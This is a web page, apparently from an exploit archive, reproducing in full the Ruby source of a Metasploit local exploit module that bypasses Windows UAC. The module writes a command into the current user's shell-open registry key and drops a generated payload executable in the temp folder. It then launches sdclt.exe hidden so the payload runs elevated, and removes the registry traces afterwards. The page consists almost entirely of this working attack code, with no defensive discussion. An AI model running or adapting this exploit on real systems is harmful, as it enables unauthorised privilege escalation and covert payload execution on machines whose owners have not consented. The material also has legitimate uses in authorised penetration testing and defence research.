Registermicrosoft windows escalate uac protection bypass (via shell open registry key) (metasploit)
▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info={}) super(update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)', 'Description' => %q( This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when Window backup and restore is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. ), 'License' => MSF_LICENSE, 'Author' => [ 'enigma0x3', # UAC bypass discovery and research 'bwatters-r7', # Module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] }, 'References' => [ ['URL', 'https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/'], ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1'], ['URL', 'https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass'] ], 'DisclosureDate' => 'Mar 17 2017' ) ) register_options( [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])] ) end def check if sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def write_reg_values(registry_key, payload_pathname) begin registry_createkey(registry_key) unless registry_key_exist?(registry_key) registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ") registry_setvaldata(registry_key, '', payload_pathname, "REG_SZ") rescue ::Exception => e print_error(e.to_s) end end def exploit check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end registry_key = 'HKCU\Software\Classes\Folder\shell\open\command' remove_registry_key = !registry_key_exist?(registry_key) # get directory locations straight win_dir = session.sys.config.getenv('windir') vprint_status("win_dir = " + win_dir) tmp_dir = session.sys.config.getenv('tmp') vprint_status("tmp_dir = " + tmp_dir) exploit_dir = win_dir + "\\System32\\" vprint_status("exploit_dir = " + exploit_dir) target_filepath = exploit_dir + "sdclt.exe" vprint_status("exploit_file = " + target_filepath) # make payload payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) + '.exe' payload_pathname = tmp_dir + '\\' + payload_name vprint_status("payload_pathname = " + payload_pathname) vprint_status("Making Payload") payload = generate_payload_exe reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}" vprint_status("reg_command = " + reg_command) write_reg_values(registry_key, reg_command) # Upload payload vprint_status("Uploading Payload to #{payload_pathname}") write_file(payload_pathname, payload) vprint_status("Payload Upload Complete") vprint_status("Launching " + target_filepath) begin session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true) rescue ::Exception => e print_error("Executing command failed:\n#{e}") end print_warning("This exploit requires manual cleanup of '#{payload_pathname}!") # wait for a few seconds before cleaning up print_status("Please wait for session and cleanup....") sleep(20) vprint_status("Removing Registry Changes") if remove_registry_key registry_deletekey(registry_key) else registry_deleteval(registry_key, "DelegateExecute") registry_deleteval(registry_key, '') end print_status("Registry Changes Removed") end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false print_status('UAC is Enabled, checking level...') vprint_status('Checking admin status...') case is_in_admin_group? when true print_good('Part of Administrators group! Continuing...') if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end when false fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') when nil print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') end end end
Microsoft windows escalate uac protection bypass (via shell open registry key) (metasploit) Vulnerability / Exploit Source : Microsoft windows escalate uac protection bypass (via shell open registry key) (metasploit)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes